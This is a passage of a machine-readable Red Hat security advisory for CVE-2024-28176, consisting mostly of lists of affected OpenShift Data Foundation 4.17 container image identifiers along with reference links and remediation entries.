"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x",
"9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x",
"9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x",
"9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-28176"
},
{
"category": "external",
"summary": "RHBZ#2268820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268820"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-28176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28176"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-28176",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28176"
},
{
"category": "external",
"summary": "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q",
"url": "https://github.com/panva/jose/security/advisories/GHSA-hhhv-q57g-882q"
}
],
"release_date": "2024-03-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-30T14:25:22+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
"9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64",
"9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64",
"9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x",
"9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x",
"9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x",
"9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64",
"9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x",
"9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x",
"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64",
"9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64",
"9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x",
"9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64",
